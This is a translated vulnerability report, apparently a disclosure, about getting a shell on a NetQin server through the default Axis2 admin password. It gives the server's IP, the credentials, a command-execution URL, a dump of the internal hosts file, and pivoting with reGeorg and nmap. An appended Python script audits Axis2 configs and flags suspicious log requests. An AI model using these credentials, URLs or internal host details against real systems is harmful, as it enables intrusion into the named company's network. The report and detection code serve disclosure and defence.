Intranet roaming through a weak password on a NetQin site

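Vulnerability details

A purely chance find: a weak Axis2 password led to getting a shell, after which I roamed around the internal network a little.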

http://211.151.59.27:80/axis2/axis2-admin/login

admin:axis2


Proof of vulnerability:

getshell

http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts


The hosts file shows that this is a NetQin service.

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet.  While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	localhost.localdomain	localhost BJ-YZ-S-ST040
::1	localhost6.localdomain6	localhost6
127.0.0.1	oversea
192.168.3.46	bjyz.puppet.nq.com
192.168.0.41	a03	pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217	a12	app.netqin.com
211.151.59.71	a09	blyt.netqin.com
192.168.0.143	a08	i.netqin.com i.nq.com m.nq.com
192.168.5.212	a13	c.cpsserver.cns
192.168.0.148	a05	nqses.nq.com
192.168.3.35	a11	pay.netqin.com pay.nq.com
192.168.3.53	a07	my.netqin.com
192.168.3.52	a06	mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216	a15	dbapp.nq.com
192.168.5.207	a16	dbboss.nq.com
192.168.5.218	a14	dbuis.nq.com


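With a shell in hand, I opened a proxy into the intranet with reGeorg.

I scanned the internal network ranges with nmap; the intranet is fairly large.

It involves a large number of internal systems (wiki, Jenkins, Jira, internal management systems, a meeting-room booking system, a report management system and so on), as well as a large amount of development and test documentation.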


Programmers' bug rate per thousand lines….


Jenkins means many more machines can be taken over


Point cards can be requested..

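A defender-side check for the two things this report hinges on: the Axis2 admin console credentials (admin:axis2) and requests that pass a cmd parameter to a deployed service. This is an added example, not part of the original report; the sample axis2.xml fragment, the log lines and the 12-character weak-password threshold are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

DEFAULT_CREDS = {("admin", "axis2")}  # the pair reported on this page

# Constructed sample: credential parameters as they appear in axis2.xml.
SAMPLE_XML = """<axisconfig name="AxisJava2.0">
  <parameter name="userName">admin</parameter>
  <parameter name="password">axis2</parameter>
</axisconfig>"""

# Constructed access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.9 - - [15/Jun/2016:10:01:02 +0800] "POST /axis2/axis2-admin/login HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Jun/2016:10:05:40 +0800] "GET /axis2/services/Cat/exec?cmd=cat%20/etc/hosts HTTP/1.1" 200 2048',
    '198.51.100.4 - - [15/Jun/2016:10:06:00 +0800] "GET /axis2/services/Version?wsdl HTTP/1.1" 200 900',
]

def audit_axis2_config(xml_text):
    """Return findings about the admin console credentials in an axis2.xml."""
    root = ET.fromstring(xml_text)
    params = {p.get("name"): (p.text or "").strip() for p in root.findall("parameter")}
    user, pwd = params.get("userName"), params.get("password")
    if user is None or pwd is None:
        return []
    if (user, pwd) in DEFAULT_CREDS:
        return ["default admin console credentials are still set"]
    # Assumed policy: under 12 characters or an obvious word counts as weak.
    if len(pwd) < 12 or pwd.lower() in {user.lower(), "admin", "password"}:
        return ["admin console password is weak"]
    return []

REQ = re.compile(r'"[A-Z]+ (?P<url>\S+) HTTP/[\d.]+" \d{3}')

def flag_requests(log_lines):
    """Flag admin console logins and service calls carrying a 'cmd' parameter."""
    hits = []
    for line in log_lines:
        m = REQ.search(line)
        if not m:
            continue
        url = urlsplit(m.group("url"))
        if url.path.startswith("/axis2/axis2-admin/login"):
            hits.append(("admin-login", line))
        elif url.path.startswith("/axis2/services/") and "cmd" in parse_qs(url.query):
            hits.append(("service-cmd-param", line))
    return hits
```

An admin console login from outside the management network is worth alerting on by itself, and the console is better kept off the public interface entirely.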